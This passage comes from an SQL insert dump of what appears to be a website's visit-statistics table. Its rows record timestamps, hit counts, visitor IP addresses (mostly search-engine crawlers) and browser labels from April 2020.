7.46.13.34','other'),(498661,1587195400,1,1,0,0,'66.249.64.25','chrome'),(498662,1587195726,1,1,0,0,'213.180.203.95','other'),(498663,1587196001,1,1,0,0,'66.249.64.23','chrome'),(498664,1587196043,4,4,0,0,'178.154.200.222','other'),(498665,1587196200,1,1,0,0,'213.180.203.16','other'),(498666,1587196208,1,1,0,0,'213.180.203.16','chrome'),(498667,1587196472,1,1,0,0,'157.55.39.225','other'),(498668,1587196546,2,2,0,0,'178.154.200.220','chrome'),(498669,1587196561,1,1,0,0,'31.41.117.146','chrome'),(498670,1587197078,3,3,0,0,'178.154.200.222','other'),(498671,1587197883,1,1,0,0,'178.154.200.92','other'),(498672,1587197978,1,1,0,0,'157.55.39.225','other'),(498673,1587198024,1,1,0,0,'178.154.200.236','chrome'),(498674,1587198219,1,1,0,0,'178.154.200.97','chrome'),(498675,1587198318,4,4,0,0,'178.154.200.222','other'),(498676,1587198408,1,1,0,0,'178.154.200.196','chrome'),(498677,1587198495,1,1,0,0,'178.154.200.196','other'),(498678,1587199037,1,1,0,0,'157.55.39.225','other'),(498679,1587199063,1,1,0,0,'178.154.200.220','other'),(498680,1587199432,2,2,0,0,'207.46.13.34','other'),(498681,1587199506,1,1,0,0,'178.154.200.222','chrome'),(498682,1587199554,1,1,0,0,'178.154.200.222','other'),(498683,1587199697,1,1,0,0,'213.180.203.16','chrome'),(498684,1587199957,1,1,0,0,'213.180.203.122','chrome'),(498685,1587200152,2,2,0,0,'66.249.64.23','chrome'),(498686,1587200486,1,1,0,0,'207.46.13.34','other'),(498687,1587201434,2,2,0,0,'207.46.13.34','other'),(498688,1587201439,1,1,0,0,'157.55.39.206','other'),(498689,1587201658,2,2,0,0,'66.249.64.24','chrome'),(498690,1587201743,1,1,0,0,'209.17.96.66','other'),(498691,1587202217,1,1,0,0,'178.154.200.220','chrome'),(498692,1587202408,2,2,0,0,'8.29.198.26','other'),(498693,1587202411,1,1,0,0,'66.249.64.23','chrome'),(498694,1587202448,1,1,0,0,'66.249.70.38','chrome'),(498695,1587202995,1,1,0,0,'157.55.39.206','other'),(498696,1587203073,2,2,0,0,'213.180.203.16','chrome'),(498697,1587203091,1,1,0,0,'66.249.64.25','chrome'),(498698,1587203425,1,1,0,0,'178.154.200.196','other'),(498699,1587203715,1,1,0,0,'178.154.200.222','chrome'),(498700,1587203751,1,1,0,0,'213.180.203.109','other'),(498701,1587203852,1,1,0,0,'178.154.200.222','other'),(498702,1587204395,1,1,0,0,'66.249.64.24','chrome'),(498703,1587204443,1,1,0,0,'178.154.200.97','chrome'),(498704,1587204875,1,1,0,0,'178.154.200.220','other'),(498705,1587204950,1,1,0,0,'157.55.39.206','other'),(498706,1587205056,1,1,0,0,'66.249.64.25','chrome'),(498707,1587205129,1,1,0,0,'66.249.70.36','chrome'),(498708,1587205584,1,1,0,0,'178.154.200.222','other'),(498709,1587205881,8,8,0,0,'77.120.98.235','other'),(498710,1587207170,1,1,0,0,'178.154.200.222','other'),(498711,1587207529,1,1,0,0,'178.154.200.220','chrome'),(498712,1587208447,1,1,0,0,'212.103.50.215','chrome'),(498713,1587208601,1,1,0,0,'66.249.64.23','chrome'),(498714,1587208691,1,1,0,0,'109.74.154.72','chrome'),(498715,1587208927,1,1,0,0,'5.9.98.178','other'),(498716,1587208953,1,1,0,0,'207.46.13.34','other'),(498717,1587209326,1,1,0,0,'178.154.200.220','chrome'),(498718,1587209831,1,1,0,0,'5.9.98.178','other'),(498719,1587210022,2,2,0,0,'157.55.39.206','other'),(498720,1587210036,1,1,0,0,'207.46.13.72','other'),(498721,1587210248,1,1,0,0,'31.13.127.19','other'),(498722,1587210371,1,1,0,0,'213.180.203.16','other'),(498723,1587210411,1,1,0,0,'178.154.200.222','other'),(498724,1587210713,1,1,0,0,'66.249.64.23','chrome'),(498725,1587210733,1,1,0,0,'5.9.98.178','other'),(498726,1587211226,1,1,0,0,'207.46.13.72','other'),(498727,1587211640,1,1,0,0,'5.9.98.178','other'),(498728,1587212259,1,1,0,0,'131.220.6.152','chrome'),(498729,1587212542,1,1,0,0,'5.9.98.178','other'),(498730,1587212707,1,1,0,0,'66.249.64.24','chrome'),(498731,1587212852,1,1,0,0,'66.249.64.25','chrome'),(498732,1587213089,1,1,0,0,'207.46.13.34','other'),(498733,1587213242,2,2,0,0,'8.29.198.26','other'),(498734,1587213326,2,2,0,0,'207.46.13.72','other'),(498735,1587213443,1,1,0,0,'5.9.98.178','other'),(498736,1587213667,1,1,0,0,'66.249.64.24','chrome'),(498737,1587214139,1,1,0,0,'66.249.70.36','chrome'),(498738,1587214156,1,1,0,0,'66.249.70.33','chrome'),(498739,1587214344,1,1,0,0,'5.9.98.178','other'),(498740,1587214645,1,1,0,0,'66.249.64.25','chrome'),(498741,1587214914,2,2,0,0,'207.46.13.72','other'),(498742,1587215065,1,0,1,0,'207.46.13.34',''),(498743,1587215256,1,1,0,0,'5.9.98.178','other'),(498744,1587215588,1,1,0,0,'213.180.203.16','other'),(498745,1587215743,1,1,0,0,'178.154.200.222','other'),(498746,1587216155,1,1,0,0,'185.15.56.22','other'),(498747,1587216159,1,1,0,0,'5.9.98.178','other'),(498748,1587217001,1,1,0,0,'66.249.72.4','chrome'),(498749,1587217060,1,1,0,0,'5.9.98.178','other'),(498750,1587217343,1,1,0,0,'207.46.13.72','other'),(498751,1587217709,1,1,0,0,'157.55.39.70','other'),(498752,1587217913,1,1,0,0,'167.114.172.224','other'),(498753,1587217943,1,1,0,0,'167.114.172.224','chrome'),(498754,1587217948,1,1,0,0,'207.46.13.248','other'),(498755,1587217961,1,1,0,0,'5.9.98.178','other'),(498756,1587218888,1,1,0,0,'66.249.64.25','chrome'),(498757,1587218895,1,1,0,0,'5.9.98.178','other'),(498758,1587219006,1,1,0,0,'207.46.13.72','other'),(498759,1587221753,1,1,0,0,'207.46.13.34','other'),(498760,1587222728,1,1,0,0,'66.249.64.23','chrome'),(498761,1587224067,2,2,0,0,'8.29.198.26','other'),(498762,1587224353,2,2,0,0,'207.46.13.72','other'),(498763,1587224862,1,1,0,0,'193.106.30.99','firefox'),(498764,1587225165,1,1,0,0,'66.249.64.24','chrome'),(498765,1587225546,1,0,1,0,'157.55.39.206',''),(498766,1587225790,2,2,0,0,'157.55.39.206','other'),(498767,1587226171,1,0,1,0,'207.46.13.34',''),(498768,1587226197,1,1,0,0,'91.196.178.16','chrome'),(498769,1587227108,8,8,0,0,'77.120.98.235','other'),(498770,1587228107,2,2,0,0,'207.46.13.34','other'),(498771,1587228195,1,0,1,0,'157.55.39.206',''),(498772,1587229668,1,1,0,0,'66.249.64.24','chrome'),(498773,1587230130,1,1,0,0,'207.46.13.72','other'),(498774,1587230900,1,1,0,0,'66.249.70.33','chrome'),(498775,1587230953,1,1,0,0,'173.252.111.4','other'),(498776,1587230954,1,1,0,0,'173.252.111.20','other'),(498777,1587231136,2,2,0,0,'66.249.64.25','chrome'),(498778,1587231778,1,1,0,0,'13.66.139.0','other'),(498779,1587232276,2,2,0,0,'207.46.13.72','other'),(498780,1587232891,1,1,0,0,'207.46.13.34','other'),(498781,1587233201,1,1,0,0,'66.249.64.25','chrome'),(498782,1587234220,2,1,1,0,'207.46.13.72',''),(498783,1587234898,2,2,0,0,'8.29.198.26','other'),(498784,1587234945,3,3,0,0,'207.46.13.72','other'),(498785,1587235023,1,1,0,0,'66.249.70.36','chrome'),(498786,1587235213,1,1,0,0,'66.249.64.25','chrome'),(498787,1587235285,1,1,0,0,'66.249.64.23','chrome'),(498788,1587235776,4,4,0,0,'77.234.43.137','other'),(498789,1587236282,2,1,1,0,'66.249.64.24',''),(498790,1587237804,1,1,0,0,'66.249.64.23','chrome'),(498791,1587238329,1,1,0,0,'207.46.13.72','other'),(498792,1587239648,1,1,0,0,'207.46.13.34','other'),(498793,1587240387,1,1,0,0,'91.196.178.162','chrome'),(498794,1587240619,1,1,0,0,'207.46.13.72','other'),(498795,1587241748,1,1,0,0,'91.122.26.117','chrome'),(498796,1587241805,1,1,0,0,'64.94.210.138','chrome'),(498797,1587241810,1,1,0,0,'23.94.185.136','chrome'),(498798,1587242723,1,1,0,0,'207.46.13.72','other'),(498799,1587242728,2,2,0,0,'178.133.166.116','chrome'),(498800,1587242810,1,1,0,0,'93.124.40.43','chrome'),(498801,1587243929,1,1,0,0,'66.249.64.23','chrome'),(498802,1587245729,1,1,0,0,'8.29.198.27','other'),(498803,1587245941,2,2,0,0,'66.249.64.24','chrome'),(498804,1587245976,1,1,0,0,'66.249.64.23','chrome'),(498805,1587246132,1,1,0,0,'8.29.198.25','other'),(498806,1587246453,1,1,0,0,'79.137.130.95','chrome'),(498807,1587247210,1,1,0,0,'207.46.13.72','other'),(498808,1587247602,2,2,0,0,'207.46.13.34','other'),(498809,1587249982,1,1,0,0,'128.124.124.177','chrome'),(498810,1587250497,1,1,0,0,'207.46.13.34','other'),(498811,1587252289,1,1,0,0,'157.55.39.206','other'),(498812,1587252832,1,1,0,0,'178.172.147.237','chrome'),(498813,1587253206,1,1,0,0,'66.249.64.23','chrome'),(498814,1587254107,1,1,0,0,'62.205.134.182','other'),(498815,1587254665,1,1,0,0,'3.12.162.184','chrome'),(498816,1587254699,3,2,1,0,'207.46.13.72',''),(498817,1587254719,8,8,0,0,'77.120.98.235','other'),(498818,1587255736,1,1,0,0,'207.46.13.34','other'),(498819,1587255774,2,2,0,0,'207.46.13.72','other'),(498820,1587255900,1,1,0,0,'157.55.39.206','other'),(498821,1587256561,1,1,0,0,'8.29.198.26','other'),(498822,1587256849,2,2,0,0,'66.249.64.24','chrome'),(498823,1587256962,1,1,0,0,'8.29.198.25','other'),(498824,1587257077,1,1,0,0,'213.180.203.17','other'),(498825,1587257388,1,1,0,0,'157.55.39.206','other'),(498826,1587257827,2,2,0,0,'66.249.64.24','chrome'),(498827,1587258117,1,1,0,0,'66.249.70.38','chrome'),(498828,1587258208,1,0,1,0,'66.249.64.23',''),(498829,1587258859,2,2,0,0,'207.46.13.72','other'),(498830,1587258863,1,1,0,0,'207.46.13.34','other'),(498831,1587260355,1,1,0,0,'207.46.13.72','other'),(498832,1587261670,2,2,0,0,'207.46.13.34','other'),(498833,1587262582,10,10,0,0,'178.154.200.222','other'),(498834,1587262628,7,7,0,0,'213.180.203.16','other'),(498835,1587262819,1,1,0,0,'178.154.200.236','other'),(498836,1587263300,1,1,0,0,'66.249.64.23','chrome'),(498837,1587265039,1,1,0,0,'207.46.13.72','other'),(498838,1587265044,1,1,0,0,'157.55.39.206','other'),(498839,1587265064,1,1,0,0,'207.46.13.34','other'),(498840,1587265092,1,1,0,0,'178.154.200.241','other'),(498841,1587265135,1,1,0,0,'66.249.64.25','chrome'),(498842,1587265898,1,1,0,0,'178.154.200.222','other'),(498843,1587266464,1,1,0,0,'157.55.39.206','other'),(498844,1587266608,1,1,0,0,'213.180.203.16','other'),(498845,1587266931,1,1,0,0,'178.154.200.236','other'),(498846,1587267032,3,3,0,0,'35.193.250.101','chrome'),(498847,1587267098,2,2,0,0,'104.154.138.162','chrome'),(498848,1587267108,3,3,0,0,'35.225.179.246','chrome'),(498849,1587267118,3,3,0,0,'35.239.203.104','chrome'),(498850,1587267124,1,1,0,0,'178.154.200.220','other'),(498851,1587267128,3,3,0,0,'104.197.141.173','chrome'),(498852,1587267140,2,2,0,0,'35.238.131.221','chrome'),(498854,1587267395,1,1,0,0,'8.29.198.26','other'),(498855,1587267459,1,1,0,0,'207.46.13.34','other'),(498856,1587267763,1,1,0,0,'46.211.58.199','chrome'),(498857,1587267791,1,1,0,0,'8.29.198.27','other'),(498858,1587268062,1,0,1,0,'66.249.64.25',''),(498859,1587268191,1,1,0,0,'66.249.64.23','chrome'),(498860,1587269866,1,1,0,0,'207.46.13.34','other'),(498861,1587270094,3,3,0,0,'178.154.200.112','other'),(498862,1587270157,1,1,0,0,'207.46.13.50','other'),(498863,1587270316,1,1,0,0,'88.155.176.79','chrome'),(498864,1587271241,1,1,0,0,'207.46.13.50','other'),(498865,1587271545,1,1,0,0,'62.205.134.182','other'),(498866,1587272647,1,1,0,0,'94.153.25.194','other'),(498867,1587272802,1,1,0,0,'207.46.13.50','other'),(498868,1587273608,2,2,0,0,'178.154.200.222','other'),(498869,1587274444,8,8,0,0,'77.120.98.235','other'),(498870,1587275194,1,1,0,0,'178.154.200.222','other'),(498871,1587276673,1,1,0,0,'66.249.64.24','chrome'),(498872,1587276977,2,2,0,0,'178.154.200.222','other'),(498873,1587278223,2,2,0,0,'8.29.198.27','other'),(498874,1587278589,1,1,0,0,'178.154.200.196','other'),(498875,1587278600,1,1,0,0,'178.154.200.220','other'),(498876,1587279014,1,1,0,0,'178.154.200.97','other'),(498877,1587279537,2,2,0,0,'66.249.64.24','chrome'),(498878,1587279718,2,2,0,0,'66.249.64.23','chrome'),(498879,1587280803,3,3,0,0,'157.55.39.206','other'),(498880,1587280877,2,2,0,0,'157.55.39.198','other'),(498881,1587281125,1,1,0,0,'207.46.13.34','other'),(498882,1587281659,1,1,0,0,'178.154.200.220','other'),(498883,1587282257,1,1,0,0,'91.196.178.16','chrome'),(498884,1587282436,1,1,0,0,'66.249.64.23','chrome'),(498885,1587283064,1,1,0,0,'207.46.13.34','other'),(498886,1587283469,1,1,0,0,'66.249.64.23','chrome'),(498887,1587283505,1,1,0,0,'66.249.70.36','chrome'),(498888,1587284305,1,1,0,0,'173.252.111.5','other'),(498889,1587284614,1,1,0,0,'91.196.178.16','chrome'),(498890,1587284704,1,1,0,0,'207.46.13.34','other'),(498891,1587284932,2,2,0,0,'178.154.200.222','other'),(498892,1587286881,2,2,0,0,'66.249.64.24','chrome'),(498893,1587287196,1,1,0,0,'173.252.111.21','other'),(498894,1587287240,1,1,0,0,'173.252.111.13','other'),(498895,1587287241,1,1,0,0,'173.252.111.22','other'),(498898,1587287414,1,1,0,0,'85.249.95.245','firefox'),(498899,1587288506,1,1,0,0,'66.249.70.36','chrome'),(498900,1587288775,1,1,0,0,'173.252.111.7','other'),(498901,1587289052,1,1,0,0,'8.29.198.26','other'),(498902,1587289165,1,1,0,0,'94.130.9.183','other'),(498903,1587289456,1,1,0,0,'8.29.198.27','other'),(498904,1587289648,1,1,0,0,'157.55.39.198','other'),(498905,1587290077,1,1,0,0,'66.249.64.23','chrome'),(498906,1587290565,1,1,0,0,'178.154.200.196','other'),(498907,1587290639,1,1,0,0,'77.111.244.25','chrome'),(498908,1587290739,2,2,0,0,'5.58.142.199','firefox'),(498909,1587290868,1,1,0,0,'128.124.150.15','other'),(498910,1587291034,2,2,0,0,'207.46.13.34','other'),(498911,1587291125,1,1,0,0,'213.180.203.122','other'),(498912,1587291133,1,1,0,0,'66.249.64.23','chrome'),(498913,1587292474,1,1,0,0,'66.249.64.25','chrome'),(498914,1587292492,1,1,0,0,'66.249.64.24','chrome'),(498915,1587292779,1,1,0,0,'157.55.39.198','other'),(498916,1587293048,1,1,0,0,'173.252.111.8','other'),(498917,1587293241,1,1,0,0,'66.249.64.23','chrome'),(498918,1587294084,1,1,0,0,'173.252.111.2','other'),(498919,1587294085,1,1,0,0,'173.252.111.18','other'),(498920,1587294349,1,1,0,0,'213.180.203.16','other'),(498921,1587294509,8,8,0,0,'77.120.98.235','other'),(498922,1587294782,1,1,0,0,'109.74.154.72','chrome'),(498923,1587295139,1,1,0,0,'66.249.64.23','chrome'),(498924,1587295247,1,1,0,0,'66.249.70.38','chrome'),(498925,1587296875,1,1,0,0,'178.154.200.222','other'),(498926,1587297611,3,3,0,0,'157.55.39.198','other'),(498927,1587297626,2,2,0,0,'157.55.39.206','other'),(498928,1587298535,1,1,0,0,'131.220.6.152','chrome'),(498929,1587298672,1,1,0,0,'66.249.64.23','chrome'),(498930,1587298781,1,1,0,0,'157.55.39.198','other'),(498931,1587298893,1,1,0,0,'178.154.200.97','other'),(498932,1587299488,1,1,0,0,'66.249.64.24','chrome'),(498933,1587299880,1,1,0,0,'8.29.198.26','other'),(498934,1587300288,1,1,0,0,'8.29.198.27','other'),(498935,1587300429,1,1,0,0,'31.13.103.23','other'),(498936,1587300502,1,0,1,0,'66.249.64.24',''),(498937,1587300622,1,1,0,0,'213.180.203.16','other'),(498938,1587300697,1,1,0,0,'178.154.200.222','other'),(498939,1587301190,1,1,0,0,'66.249.64.25','chrome'),(498940,1587301698,4,4,0,0,'66.249.64.24','chrome'),(498941,1587301934,1,1,0,0,'66.249.70.33','chrome'),(498942,1587302513,1,1,0,0,'66.249.64.23','chrome'),(498943,1587302944,1,1,0,0,'154.51.131.142','chrome'),(498944,1587302961,1,1,0,0,'157.55.39.206','other'),(498945,1587303202,1,1,0,0,'66.249.64.24','chrome'),(498946,1587303492,1,1,0,0,'66.249.70.33','chrome'),(498947,1587303746,2,2,0,0,'157.55.39.198','other'),(498948,1587303814,1,1,0,0,'207.46.13.34','other'),(498949,1587303835,1,1,0,0,'85.174.192.22','chrome'),(498950,1587304422,1,1,0,0,'91.196.178.57','chrome'),(498951,1587304682,1,1,0,0,'91.196.178.78','other'),(498952,1587304944,1,1,0,0,'91.196.177.8','chrome'),(498953,1587305053,1,1,0,0,'157.55.39.206','other'),(498954,1587305105,1,1,0,0,'66.249.64.25','chrome'),(498955,1587305536,2,2,0,0,'178.154.200.222','other'),(498956,1587306327,1,1,0,0,'178.154.200.220','other'),(498957,1587306365,1,1,0,0,'207.46.13.34','other'),(498958,1587306372,2,2,0,0,'157.55.39.198','other'),(498959,1587306517,1,1,0,0,'157.55.39.206','other'),(498960,1587306974,1,1,0,0,'193.106.30.99','firefox'),(498961,1587307153,1,1,0,0,'66.249.64.23','chrome'),(498962,1587307936,1,1,0,0,'157.55.39.198','other'),(498963,1587308840,1,1,0,0,'207.46.13.34','other'),(498964,1587309073,1,1,0,0,'66.249.70.33','chrome'),(498965,1587309155,1,1,0,0,'178.154.200.196','other'),(498966,1587309829,1,1,0,0,'91.196.178.186','chrome'),(498967,1587310708,1,1,0,0,'8.29.198.25','other'),(498968,1587310906,1,1,0,0,'157.55.39.198','other'),(498969,1587311125,1,1,0,0,'8.29.198.26','other'),(498970,1587311216,1,1,0,0,'213.180.203.16','other'),(498971,1587311525,1,0,1,0,'157.55.39.206',''),(498972,1587311610,1,1,0,0,'82.165.67.188','other'),(498973,1587311842,1,1,0,0,'213.180.203.140','other'),(498974,1587311853,1,1,0,0,'213.180.203.146','other'),(498975,1587312121,8,8,0,0,'77.120.98.235','other'),(498976,1587312445,1,1,0,0,'207.46.13.34','other'),(498977,1587312625,1,1,0,0,'46.211.155.76','chrome'),(498978,1587313750,1,1,0,0,'157.55.39.206','other'),(498979,1587313954,1,1,0,0,'178.154.200.222','other'),(498980,1587314741,1,1,0,0,'157.55.39.198','other'),(498981,1587315194,1,1,0,0,'157.55.39.206','other'),(498982,1587315526,1,1,0,0,'207.46.13.34','other'),(498983,1587315537,2,2,0,0,'178.154.200.222','other'),(498984,1587315542,1,1,0,0,'66.249.64.25','chrome'),(498985,1587316522,1,1,0,0,'66.249.64.23','chrome'),(498986,1587316668,1,0,1,0,'157.55.39.206',''),(498987,1587317166,1,1,0,0,'95.132.21.151','chrome'),(498988,1587317495,1,1,0,0,'178.154.200.222','other'),(498989,1587318057,1,1,0,0,'213.180.203.101','other'),(498990,1587318486,2,2,0,0,'157.55.39.206','other'),(498991,1587318490,1,1,0,0,'157.55.39.198','other'),(498992,1587318968,1,1,0,0,'178.154.200.222','other'),(498993,1587319167,1,1,0,0,'66.249.64.24','chrome'),(498994,1587319572,1,1,0,0,'66.249.70.38','chrome'),(498995,1587319964,1,1,0,0,'157.55.39.206','other'),(498996,1587320215,2,2,0,0,'207.46.13.34','other'),(498997,1587320483,1,1,0,0,'178.154.200.220','other'),(498998,1587320495,1,1,0,0,'91.196.178.16','chrome'),(498999,1587320565,1,1,0,0,'178.154.200.222','other'),(499000,1587321247,1,1,0,0,'213.180.203.16','other'),(499001,1587321538,1,1,0,0,'8.29.198.27','other'),(499002,1587321955,1,1,0,0,'8.29.198.25','other'),(499003,1587323105,1,1,0,0,'207.46.13.34','other'),(499004,1587323919,1,1,0,0,'178.154.200.112','other'),(499005,1587324099,1,1,0,0,'178.154.200.222','other'),(499006,1587325265,1,1,0,0,'178.154.200.220','other'),(499007,1587325412,1,1,0,0,'213.180.203.16','other'),(499008,1587325516,2,2,0,0,'178.154.200.222','other'),(499009,1587327195,2,2,0,0,'178.154.200.222','other'),(499010,1587327908,1,1,0,0,'213.238.93.155','chrome'),(499011,1587328100,1,1,0,0,'66.249.64.23','chrome'),(499012,1587328216,1,1,0,0,'178.154.200.112','other'),(499013,1587329202,2,2,0,0,'178.154.200.222','other'),(499014,1587329507,1,1,0,0,'66.249.64.25','chrome'),(499015,1587329945,2,2,0,0,'66.249.64.23','chrome'),(499016,1587330234,1,0,1,0,'157.55.39.206',''),(499017,1587330782,1,1,0,0,'173.252.111.22','other'),(499018,1587330783,1,1,0,0,'173.252.111.4','other'),(499020,1587330785,1,1,0,0,'91.196.178.102','chrome'),(499021,1587330972,1,1,0,0,'157.55.39.206','other'),(499022,1587331073,1,1,0,0,'66.249.64.25','chrome'),(499023,1587331235,2,2,0,0,'178.154.200.220','other'),(499024,1587331392,1,1,0,0,'178.154.200.222','other'),(499025,1587331412,1,1,0,0,'66.249.64.23','chrome'),(499026,1587331981,1,1,0,0,'157.55.39.198','other'),(499027,1587332372,2,2,0,0,'8.29.198.26','other'),(499028,1587332513,1,1,0,0,'178.154.200.92','other'),(499029,1587332669,1,1,0,0,'178.154.200.216','other'),(499030,1587333005,2,2,0,0,'178.154.200.222','other'),(499031,1587333358,1,1,0,0,'213.180.203.16','other'),(499032,1587333362,1,1,0,0,'178.154.200.175','other'),(499033,1587333609,1,1,0,0,'66.249.64.24','chrome'),(499034,1587334135,1,1,0,0,'207.46.13.34','other'),(499035,1587334173,1,1,0,0,'66.249.70.38','chrome'),(499036,1587334786,1,1,0,0,'66.249.64.25','chrome'),(499037,1587334966,4,4,0,0,'178.154.200.222','other'),(499038,1587335486,1,1,0,0,'66.249.64.23','chrome'),(499039,1587335857,1,1,0,0,'157.55.39.198','other'),(499040,1587336032,4,4,0,0,'178.154.200.222','other'),(499041,1587336867,1,1,0,0,'66.249.70.38','chrome'),(499042,1587337073,1,1,0,0,'178.154.200.196','other'),(499043,1587337215,2,2,0,0,'157.55.39.198','other'),(499044,1587337411,2,2,0,0,'66.249.64.24','chrome'),(499045,1587337682,4,4,0,0,'178.154.200.222','other'),(499046,1587337919,1,1,0,0,'66.249.64.25','chrome'),(499047,1587338452,1,1,0,0,'66.249.70.38','chrome'),(499048,1587339111,1,1,0,0,'178.154.200.220','other'),(499049,1587339164,1,1,0,0,'207.46.13.34','other'),(499050,1587339308,2,2,0,0,'213.180.203.16','other'),(499051,1587339482,3,3,0,0,'178.154.200.222','other'),(499052,1587340189,1,1,0,0,'157.55.39.198','other'),(499053,1587340505,1,1,0,0,'62.205.134.182','other'),(499054,1587340552,1,1,0,0,'157.55.39.206','other'),(499055,1587340569,1,1,0,0,'66.249.64.23','chrome'),(499056,1587341239,1,1,0,0,'213.180.203.16','other'),(499057,1587341411,2,2,0,0,'178.154.200.222','other'),(499058,1587341474,1,1,0,0,'66.249.70.38','chrome'),(499059,1587341519,1,1,0,0,'157.55.39.206','other'),(499060,1587341934,1,1,0,0,'213.217.0.7','chrome'),(499061,1587342314,1,1,0,0,'178.154.200.220','other'),(499062,1587342517,1,1,0,0,'66.249.70.33','chrome'),(499063,1587342892,1,1,0,0,'66.249.64.24','chrome'),(499064,1587343081,2,2,0,0,'178.154.200.222','other'),(499065,1587343201,1,1,0,0,'8.29.198.26','other'),(499066,1587343616,1,1,0,0,'8.29.198.25','other'),(499067,1587344168,1,1,0,0,'66.249.64.25','chrome'),(499068,1587344910,1,1,0,0,'66.249.70.33','chrome'),(499069,1587345036,1,1,0,0,'178.154.200.222','other'),(499070,1587345144,2,1,1,0,'207.46.13.34',''),(499071,1587345486,1,1,0,0,'157.55.39.198','other'),(499072,1587345666,1,1,0,0,'66.249.64.24','chrome'),(499073,1587345957,1,1,0,0,'157.55.39.206','other'),(499074,1587347522,1,1,0,0,'157.55.39.198','other'),(499075,1587348339,1,1,0,0,'66.249.64.25','chrome'),(499076,1587348641,3,1,2,0,'157.55.39.206',''),(499077,1587349146,1,1,0,0,'157.55.39.206','other'),(499078,1587350257,1,1,0,0,'66.249.64.25','chrome'),(499079,1587352584,1,1,0,0,'92.63.111.27','other'),(499080,1587354025,1,1,0,0,'8.29.198.27','other'),(499081,1587354443,1,1,0,0,'66.249.64.24','chrome'),(499082,1587354446,1,1,0,0,'8.29.198.26','other'),(499083,1587355656,1,1,0,0,'66.249.64.24','chrome'),(499084,1587356075,1,1,0,0,'157.55.39.206','other'),(499085,1587356926,1,1,0,0,'92.38.136.69','chrome'),(499086,1587357682,1,1,0,0,'66.249.64.24','chrome'),(499087,1587358020,1,1,0,0,'62.205.134.182','other'),(499088,1587358348,1,1,0,0,'66.249.64.23','chrome'),(499089,1587358661,1,1,0,0,'157.55.39.206','other'),(499090,1587358888,1,1,0,0,'115.84.92.107','chrome'),(499091,1587358972,1,1,0,0,'66.249.64.24','chrome'),(499092,1587359356,1,1,0,0,'157.55.39.198','other'),(499093,1587360811,1,1,0,0,'88.155.65.138','chrome'),(499094,1587361330,1,1,0,0,'66.249.64.23','chrome'),(499095,1587362564,2,2,0,0,'207.46.13.34','other'),(499096,1587363553,1,1,0,0,'66.249.70.36','chrome'),(499097,1587364403,1,1,0,0,'178.154.200.220','other'),(499098,1587364751,1,1,0,0,'157.55.39.198','other'),(499099,1587364856,1,1,0,0,'8.29.198.27','other'),(499100,1587365277,1,1,0,0,'8.29.198.26','other'),(499101,1587366106,1,1,0,0,'207.46.13.34','other'),(499102,1587366666,1,1,0,0,'31.13.127.11','other'),(499103,1587366668,1,1,0,0,'31.13.127.7','other'),(499104,1587366671,1,1,0,0,'31.13.127.17','other'),(499105,1587367036,1,1,0,0,'66.249.64.24','chrome'),(499106,1587367201,1,1,0,0,'66.249.64.23','chrome'),(499107,1587369632,1,1,0,0,'35.246.54.148','firefox'),(499108,1587369789,1,1,0,0,'207.46.13.34','other'),(499109,1587369794,2,2,0,0,'157.55.39.198','other'),(499110,1587369798,2,2,0,0,'157.55.39.206','other'),(499111,1587369937,1,1,0,0,'94.153.64.212','chrome'),(499112,1587372439,1,1,0,0,'66.249.64.25','chrome'),(499113,1587373162,1,0,1,0,'66.249.64.24',''),(499114,1587373397,1,1,0,0,'66.249.64.23','chrome'),(499115,1587374101,1,1,0,0,'157.55.39.198','other'),(499116,1587374125,1,1,0,0,'207.46.13.34','other'),(499117,1587374783,1,1,0,0,'157.55.39.206','other'),(499118,1587375611,1,1,0,0,'3.16.167.56','chrome'),(499119,1587375683,2,2,0,0,'8.29.198.25','other'),(499120,1587376955,1,1,0,0,'185.102.185.87','chrome'),(499121,1587379222,3,3,0,0,'207.46.13.34','other'),(499122,1587379581,1,1,0,0,'157.55.39.198','other'),(499123,1587380158,1,1,0,0,'157.55.39.206','other'),(499124,1587380351,1,1,0,0,'51.77.246.67','other'),(499125,1587381554,1,1,0,0,'66.249.64.23','chrome'),(499126,1587382045,1,1,0,0,'109.74.154.72','chrome'),(499127,1587382824,1,1,0,0,'157.55.39.206','other'),(499128,1587382905,1,1,0,0,'94.153.73.161','chrome'),(499129,1587384868,1,1,0,0,'66.249.64.23','chrome'),(499130,1587384990,1,1,0,0,'173.252.111.9','other'),(499131,1587385075,1,1,0,0,'64.225.62.112','chrome'),(499132,1587385105,1,1,0,0,'131.220.6.152','chrome'),(499133,1587386117,3,3,0,0,'157.55.39.206','other'),(499134,1587386339,1,1,0,0,'173.252.111.19','other'),(499135,1587386409,3,3,0,0,'157.55.39.198','other'),(499136,1587386439,1,1,0,0,'66.249.64.24','chrome'),(499137,1587386511,2,2,0,0,'8.29.198.25','other'),(499138,1587387116,1,1,0,0,'66.249.70.33','chrome'),(499139,1587387424,1,1,0,0,'157.55.39.206','other'),(499140,1587387773,1,1,0,0,'66.249.64.23','chrome'),(499141,1587388681,1,1,0,0,'66.249.70.33','chrome'),(499142,1587389542,1,1,0,0,'173.252.111.13','other'),(499143,1587389555,1,1,0,0,'173.252.111.10','other'),(499144,1587389556,1,1,0,0,'173.252.111.18','other'),(499145,1587389629,1,1,0,0,'157.55.39.206','other'),(499146,1587389652,1,1,0,0,'91.196.178.16','chrome'),(499147,1587389661,1,1,0,0,'66.249.64.25','chrome'),(499148,1587389672,1,1,0,0,'66.249.64.24','chrome'),(499149,1587391436,1,1,0,0,'207.46.13.34','other'),(499150,1587391509,1,1,0,0,'173.252.111.24','other'),(499151,1587391802,1,1,0,0,'91.196.178.74','chrome'),(499152,1587392136,1,1,0,0,'66.249.70.36','chrome'),(499153,1587392191,1,1,0,0,'66.249.64.23','chrome'),(499154,1587392765,1,1,0,0,'66.249.70.33','chrome'),(499155,1587393081,1,1,0,0,'157.55.39.198','other'),(499156,1587393433,1,1,0,0,'207.46.13.34','other'),(499157,1587393955,1,1,0,0,'66.249.64.25','chrome'),(499158,1587394082,2,2,0,0,'157.55.39.206','other'),(499159,1587394327,1,1,0,0,'66.249.64.23','chrome'),(499160,1587395294,1,1,0,0,'31.13.103.3','other'),(499161,1587395295,1,1,0,0,'31.13.103.10','other'),(499162,1587395435,8,8,0,0,'77.120.98.235','other'),(499163,1587395784,1,1,0,0,'207.46.13.34','other'),(499164,1587396627,1,1,0,0,'66.249.70.38','chrome'),(499165,1587397329,1,1,0,0,'178.154.200.222','other'),(499166,1587397330,1,1,0,0,'213.180.203.16','other'),(499167,1587397348,2,2,0,0,'8.29.198.27','other'),(499168,1587398172,1,1,0,0,'66.249.70.36','chrome'),(499169,1587398320,1,